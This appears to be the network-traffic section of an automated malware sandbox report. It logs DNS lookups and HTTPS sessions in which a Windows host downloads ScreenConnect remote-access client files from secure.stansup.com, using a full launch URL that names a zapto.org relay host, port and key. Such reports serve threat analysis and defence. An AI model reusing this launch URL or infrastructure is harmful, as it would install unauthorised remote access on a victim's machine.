                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.278568983 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.278647900 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.278647900 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.395560026 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.395584106 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.395834923 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.395842075 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.397975922 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.512690067 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.512711048 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.512870073 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.512877941 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.512953997 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.630212069 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.630238056 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.630326033 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.630332947 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.630386114 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.748101950 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.748131990 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.748270035 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.748270035 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:44.748277903 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.443873882 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.443913937 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.444005966 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.444005966 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.444015026 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.444056988 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.530600071 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.530623913 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.530677080 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.530694962 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.530792952 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.530792952 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.561731100 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.561752081 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.561847925 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.561855078 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.561892033 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.561912060 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.647646904 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.647671938 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.647751093 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.647758961 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.647797108 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.647900105 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.679349899 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.679369926 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.679430008 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.679447889 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.679506063 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.680531025 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.680548906 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.680615902 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.680622101 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.680675030 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796226978 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796252012 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796392918 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796426058 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796437979 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796504974 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796741009 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.796828032 CEST4434973379.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.797079086 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.797271967 CEST49733443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.823668957 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.823791981 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.823888063 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.824207067 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:46.824243069 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:47.652349949 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:47.653733015 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:47.653757095 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.011888981 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.011915922 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.011934042 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.012037992 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.012061119 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.012123108 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.127405882 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.127425909 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.127516031 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.127538919 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.127578974 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.128670931 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.128686905 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.128741980 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.128751040 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.128777981 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.128797054 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.243638992 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.243658066 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.243791103 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.243839979 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.243882895 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.358480930 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.358509064 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.358639002 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.358714104 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.358771086 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.359929085 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.359944105 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.360018015 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.360033989 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.360085011 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.474750996 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.474771976 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:48.474864006 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.833739042 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872024059 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872051001 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872109890 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872153997 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872185946 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.872209072 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873029947 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873050928 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873106956 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873131037 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873156071 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.873176098 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987111092 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987139940 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987332106 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987360001 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987426043 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987529993 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987548113 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987596989 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987611055 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.987674952 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.988924980 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.988941908 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.989007950 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.989022017 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:49.989074945 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103811026 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103838921 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103935957 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.103975058 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104028940 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104480028 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104505062 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104545116 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104559898 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104588985 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104612112 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104731083 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104768038 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104795933 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104815960 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.104841948 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.105156898 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.105220079 CEST4434973479.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:50.105273008 CEST49734443192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.968599081 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.973995924 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.974112034 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.938801050 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.944777966 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.182038069 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.204318047 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.210238934 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.450802088 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:55.516299009 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.263032913 CEST497368041192.168.2.979.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.268748999 CEST80414973679.110.49.185192.168.2.9
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.268842936 CEST497368041192.168.2.979.110.49.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 19:27:15.994709015 CEST | 60892 | 53 | 192.168.2.9 | 1.1.1.1
Oct 25, 2024 19:27:16.153800964 CEST | 53 | 60892 | 1.1.1.1 | 192.168.2.9
Oct 25, 2024 19:27:53.623512030 CEST | 54375 | 53 | 192.168.2.9 | 1.1.1.1
Oct 25, 2024 19:27:53.800832987 CEST | 53 | 54375 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 19:27:15.994709015 CEST | 192.168.2.9 | 1.1.1.1 | 0x6662 | Standard query (0) | secure.stansup.com | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:53.623512030 CEST | 192.168.2.9 | 1.1.1.1 | 0x64b9 | Standard query (0) | kjh231a.zapto.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 25, 2024 19:27:16.153800964 CEST | 1.1.1.1 | 192.168.2.9 | 0x6662 | No error (0) | secure.stansup.com |  | 79.110.49.185 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 84.201.210.34 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.39 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 84.201.210.19 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 84.201.210.36 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.37 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.19 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.20 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:18.341581106 CEST | 1.1.1.1 | 192.168.2.9 | 0x207d | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 84.201.210.23 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:20.101511002 CEST | 1.1.1.1 | 192.168.2.9 | 0x1927 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 19:27:20.101511002 CEST | 1.1.1.1 | 192.168.2.9 | 0x1927 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:22.485126019 CEST | 1.1.1.1 | 192.168.2.9 | 0xcf97 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 25, 2024 19:27:22.485126019 CEST | 1.1.1.1 | 192.168.2.9 | 0xcf97 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:27:53.800832987 CEST | 1.1.1.1 | 192.168.2.9 | 0x64b9 | No error (0) | kjh231a.zapto.org |  | 79.110.49.185 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                        • secure.stansup.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:17 UTC | 628 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:17 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 118229
                                                                                                                                                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:17 GMT
                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49713 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:19 UTC | 100 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:19 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17858
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:19 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49723 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:25 UTC | 126 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:25 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:24 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49724 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:27 UTC | 134 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:27 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61216
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:26 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49725 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:28 UTC | 114 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:29 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:28 GMT
Connection: close
2024-10-25 17:27:29 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49727 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:30 UTC | 133 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:30 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:29 GMT
Connection: close
